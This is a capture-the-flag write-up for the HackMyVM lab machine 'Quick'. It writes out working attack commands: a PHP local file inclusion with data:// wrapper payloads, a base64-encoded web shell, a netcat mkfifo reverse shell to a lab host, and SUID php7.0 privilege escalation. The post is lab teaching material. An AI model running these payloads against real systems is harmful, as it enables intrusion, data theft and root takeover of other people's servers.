Post

HackMyVM - Quick

Posted Updated
By r4yl3x 2 min read

Enumeration

Ports

Target has only one port open - 80 (HTTP) I discovered LFI in the endpont

1

http://192.168.56.101/index.php?page=

since i know it’s PHP, i’ll grab a PHP wrappers from File Inclusion/Path traversal - HackTricks
I’ll get the /etc/passwd file using this payload:

1

data://text/plain,<?php echo base64_encode(file_get_contents("/etc/passwd")); ?>

Foothold

I see there’s a user andrew on the target and i can read their home directory which contains the user flag.
I’ll use one of the payloads to get RCE and retrieve user flag Payload:

1

data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

Request:

1

curl --path-as-is http://192.168.56.101/index.php?page="data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=&cmd="cat+/home/andrew/user.txt""

The content of the base64 is

1

<?php system($_GET['cmd']);echo 'Shell done !'; ?>

Result:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

    <main>


                                 _________
                          _.--""'-----,   `"--.._
                       .-''   _/_      ; .'"----,`-,
                     .'      :___:     ; :      ;;`.`.
                    .      _.- _.-    .' :      ::  `..
                 __;..----------------' :: ___  ::   ;;
            .--"". '           ___.....`:=(___)-' :--'`.
          .'   .'         .--''__       :       ==:    ;
      .--/    /        .'.''     ``-,   :         :   '`-.
   ."', :    /       .'-`\\       .--.\ :         :  ,   _\
  ;   ; |   ;       /:'  ;;      /__  \\:         :  :  /_\\
  |\_/  |   |      / \__//      /"--\\ \:         :  : ;|`\|
  : "  /\__/\____//   """      /     \\ :         :  : :|'||
["""""""""--------........._  /      || ;      __.:--' :|//|
 "------....______         ].'|      // |--"""'__...-'`\ \//
   `|HMV{flag-flag}|.--'": :  \    //  |---"""      \__\_/
     """""""""'            \ \  \_.//  /
       `---'                \ \_     _'
                             `--`---'

Privilege Escalation

I got reverse shell as www-data using this payload:

1

curl --path-as-is http://192.168.56.101/index.php?page="data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=&cmd="rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20192.168.56.1%203371%20%3E%2Ftmp%2Ff""

Stabilize the shell.
Looking at he SUID binaries i see an unusual binary /usr/bin/php7.0 according to php | GTFOBins i can spawn a shell as root:

1

/usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"

I have shell as root, so i’ll retieve the root flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

# cat /root/root.txt


            ___.............___
         ,dMMMMMMMMMMMMMMMMMMMMMb.
        dMMMMMMMMMMMMMMMMMMMMMMMMMb
        |        | -_  - |        |
        |        |_______|___     |
        |     ___......./'.__`\   |
        |_.-~"               `"~-.|
        7\         _...._        |`.
       /  l     .-'      `-.     j  \
      :   .qp. / __________ \ .qp.   :
      |  d8888b |          | d8888b  |
  .---:  `Y88P|_|__________|_|Y88P'\/`"-.
 /     : /,------------------------.:    \
:      |`.    | | [_FLAG_] ||     ,'|     :
`\.____|  `.  : `.________.'|   ,'  |____.'
  MMMMM|   |  |`-.________.-|  /    |MMMMM
 .-------------`------------'-'-----|-----.
(___HMV{root-flag}__)
  MMMMMM                            MMMMMM
  `MMMM'                            `MMMM'
CTF, HACKMYVM
LFI LFI2RCE PHP-LFI
This post is licensed under CC BY 4.0 by the author.